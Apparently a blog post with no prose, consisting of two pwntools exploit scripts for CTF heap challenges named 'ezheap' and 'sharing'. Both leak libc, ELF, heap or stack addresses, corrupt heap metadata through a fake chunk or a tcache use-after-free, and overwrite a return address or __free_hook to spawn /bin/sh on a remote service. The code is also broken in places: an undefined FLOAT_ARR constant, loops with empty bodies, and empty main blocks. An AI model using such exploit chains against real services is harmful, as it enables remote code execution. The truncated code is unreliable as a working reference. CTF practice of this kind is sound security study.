



from pwn import *
import struct

#p = process(["./ld-2.27.so", "./ezheap"], env={"LD_PRELOAD":"./libc-2.27.so"})
p = remote("", 20077)
elf = ELF("./ezheap")
libc = ELF("./libc-2.27.so")
ld = ELF("./ld-2.27.so")
context.log_level = "debug"

UINT16_ARR = 2
UINT32_ARR = 3

def alloc(a_type:int, size:int, idx:int):
    p.sendlineafter(b"enter your choice>>\n", b"1")
    p.sendlineafter(b"which type >>\n", str(a_type).encode())
    p.sendlineafter(b"size>>\n", str(size).encode())
    p.sendlineafter(b"idx>>\n", str(idx).encode())
def edit(a_type:int, idx:int, ele_idx:int, value):
    p.sendlineafter(b"enter your choice>>\n", b"2")
    p.sendlineafter(b"which type >>\n", str(a_type).encode())
    p.sendlineafter(b"idx>>\n", str(idx).encode())
    p.sendlineafter(b"element_idx>>\n", str(ele_idx).encode())
    p.sendlineafter(b"value>>\n", value)
def view(a_type:int, idx:int, ele_idx:int):
    p.sendlineafter(b"enter your choice>>\n", b"3")
    p.sendlineafter(b"which type >>\n", str(a_type).encode())
    p.sendlineafter(b"idx>>\n", str(idx).encode())
    p.sendlineafter(b"element_idx>>\n", str(ele_idx).encode())
def delete(a_type:int, idx:int):
    p.sendlineafter(b"enter your choice>>\n", b"4")
    p.sendlineafter(b"which type >>\n", str(a_type).encode())
    p.sendlineafter(b"idx>>\n", str(idx).encode())

# base: 0xf7fc7000
# uint16:    0xf7fc7000+0x4040
# uint8:     0xf7fc7000+0x5040
# uint32:    0xf7fc7000+0x6040
# float:     0xf7fc7000+0x7040

# 0xf7fc7000+0x9060

def exp():
    # leak new_heap_addr
    ## chain
    alloc(UINT32_ARR,  0xff8, 0)
    alloc(UINT32_ARR,  0xff8, 1)
    ## free chain
    delete(UINT32_ARR, 0)
    delete(UINT32_ARR, 1)
    ## show ptr
    alloc(UINT32_ARR,  0xff8, 4) # help chunk
    view(UINT32_ARR, 4, 0)
    leak_addr = int(p.recvuntil(b"\n", drop=True), 10)
    libc_base = (leak_addr & 0xfffff000) + 0x5000
    system = libc_base + libc.symbols["system"]
    binsh = libc_base + next(libc.search(b"/bin/sh"))
    one_gadget = libc_base + 0x13563f
    print("leak_addr:", hex(leak_addr))
    print("libc_base:", hex(libc_base))
    ## padding, no use
    alloc(UINT32_ARR,  0x100, 5)
    # leak elf_base
    alloc(UINT32_ARR,  0x4, 0)
    alloc(UINT32_ARR,  0x4, 1)
    delete(UINT32_ARR, 0)
    delete(UINT32_ARR, 1)
    target_header = libc_base - 0x10000
    pre_leak_addr = target_header + 0x18 # contant elf addr
    fake_chunk_hdr = target_header | (0x4+0x4)
    print("target_header:", hex(target_header))
    print("pre_leak_addr:", hex(pre_leak_addr))
    print("fake_chunk_hdr:", hex(fake_chunk_hdr))

    float_payload = struct.unpack("<d", p32(fake_chunk_hdr)+p32(pre_leak_addr))[0]
    print("float_payload:", float_payload)
    for i in range(0x800):
        edit(FLOAT_ARR, 0x82d, i, str(float_payload).encode())
    alloc(UINT32_ARR,  0x4, 2)
    alloc(UINT32_ARR,  0x4, 3)
    view(UINT32_ARR, 3, 0)
    elf_leak = int(p.recvuntil(b"\n", drop=True), 10)
    elf_base = elf_leak - 0x9060
    atoll_got = elf_base + elf.got["atoll"]
    ## build help_chunk
    alloc(UINT32_ARR,  0x2000, 6) # help chunk
    uint32_item_5 = elf_base + 0x6054
    help_chunk = libc_base - 0x16000
    print("uint32_item_5:", hex(uint32_item_5))
    print("elf_leak:", hex(elf_leak))
    print("elf_base:", hex(elf_base))
    # attack uint32_array
    alloc(UINT32_ARR,  0x4, 0)
    alloc(UINT32_ARR,  0x4, 1)
    delete(UINT32_ARR, 0)
    delete(UINT32_ARR, 1)

    float_payload = struct.unpack("<d", p32(fake_chunk_hdr)+p32(uint32_item_5-4))[0]
    print("float_payload:", float_payload)
    for i in range(0x800):
        edit(FLOAT_ARR, 0x82d, i, str(float_payload).encode())
    alloc(UINT32_ARR,  0x4, 2)
    alloc(UINT32_ARR,  0x4, 3)
    edit(UINT32_ARR, 3, 0, str(help_chunk).encode())
    print("help_chunk:", hex(help_chunk))
    print("uint32_item_5:", hex(uint32_item_5))
    # leak stack && build rop
    envrion = libc_base + libc.symbols["environ"]
    print("envrion:", hex(envrion))
    edit(UINT32_ARR, 6, 0, str(4).encode()) # item_size
    edit(UINT32_ARR, 6, 1, str(0xff).encode()) # item_num
    edit(UINT32_ARR, 6, 2, str(envrion).encode()) # array_ptr
    ## leak environ
    view(UINT32_ARR, 5, 0)
    stack_leak = int(p.recvuntil(b"\n", drop=True), 10)
    main_ret = stack_leak - 0xa4
    ## build fake array
    edit(UINT32_ARR, 6, 0, str(4).encode()) # item_size
    edit(UINT32_ARR, 6, 1, str(0xff).encode()) # item_num
    edit(UINT32_ARR, 6, 2, str(main_ret).encode()) # array_ptr
    ## write rop
    edit(UINT32_ARR, 5, 0, str(system).encode()) # system
    edit(UINT32_ARR, 5, 1, str(0xdeadbeef).encode()) # fake ret
    edit(UINT32_ARR, 5, 2, str(binsh).encode()) # /bin/sh
    print("main_ret:", hex(main_ret))
    p.sendline(b"5") # exit
    p.sendline("cat flag")

if __name__ == "__main__":



from pwn import *

#p = process("./sharing", env={"LD_PRELOAD":"./libc-2.27.so"})
p = remote("", 30000)
elf = ELF("./sharing")
libc = ELF("./libc-2.27.so")
context.log_level = "debug"
context.arch = "amd64"

hint_str = p32(0x2F767991)+p32(0)*3

def add(idx:int, size:int):
    p.sendlineafter(b"Choice: ", b"1")
    p.sendlineafter(b"Idx: ", str(idx).encode())
    p.sendlineafter(b"Sz: ", str(size).encode())

def send(_from:int, _to:int):
    p.sendlineafter(b"Choice: ", b"2")
    p.sendlineafter(b"From: ", str(_from).encode())
    p.sendlineafter(b"To: ", str(_to).encode())    
def show(idx:int):
    p.sendlineafter(b"Choice: ", b"3")
    p.sendlineafter(b"Idx: ", str(idx).encode())
def edit(idx:int, content):
    p.sendlineafter(b"Choice: ", b"4")
    p.sendlineafter(b"Idx: ", str(idx).encode())
    p.sendlineafter(b"Content: ", content)
def hint(addr:int):
    p.sendlineafter(b"Choice: ", b"57005")
    p.sendlineafter(b"Hint: ", hint_str)
    p.sendlineafter(b"Addr: ", str(addr).encode())

# base: 0x0000555555554000
# 0x0000555555554000+0x207260

def exp():
    #gdb.attach(p, "b *0x0000555555554000+0x1ce8\nc\n") #hint
    # leak heap
    ## build 0x30 free chain
    add(0, 0x20)
    add(1, 0x20)
    add(0, 0x30)
    add(1, 0x30)
    ## leak value
    add(2, 0x20)
    heap_leak = u64(p.recv(8))
    heap_base = heap_leak - 0x135d0 # maybe diff
    print("heap_leak:", hex(heap_leak))
    print("heap_base:", hex(heap_base))
    # leak libc
    add(3, 0x410)
    add(4, 0x10)
    add(3, 0x10)
    ## leak value
    add(3, 0x410)
    libc_leak = u64(p.recv(8))
    libc_base = libc_leak - 0x70 - libc.symbols[b"__malloc_hook"]
    __free_hook = libc_base + libc.symbols[b"__free_hook"]
    system = libc_base + libc.symbols[b"system"]
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    # uaf attack
    ## build 0x50 free chain (target)
    add(5, 0x40)
    add(6, 0x40)
    add(5, 0x70)
    add(6, 0x70)
    ## sender
    add(7, 0x10)
    edit(7, b"from")
    ## receiver
    add(8, 0x10)
    edit(8, b"to")
    ## modify receiver
    receiver_obj = heap_base + 0x13dd0
    receiver_content_ptr = receiver_obj + 0x18
    dec_times_1 = 0xb0 // 2
    dec_times_2 = (0xe-0xc) // 2
    ### dec the first byte
    for i in range(dec_times_1):
    ### dec the second byte
    for i in range(dec_times_2):
    ### modify tcache key
    tcache_key_addr = heap_base + 0x13c58
    print("tcache_key_addr:", hex(tcache_key_addr))
    print("receiver_obj:", hex(receiver_obj))
    print("receiver_content_ptr:", hex(receiver_content_ptr))
    ## send && rewrite tcache bin
    send(7, 8)
    add(9, 0x40)
    edit(9, p64(__free_hook))
    ## get free_hook
    add(10, 0x40)
    add(11, 0x40) # free_hook
    edit(11, p64(system))
    print("__free_hook:", hex(__free_hook))
    print("system:", hex(system))
    # get shell
    add(12, 0x10)
    edit(12, b"/bin/sh\x00")
    add(12, 0x10) 

if __name__ == "__main__":

标签: none
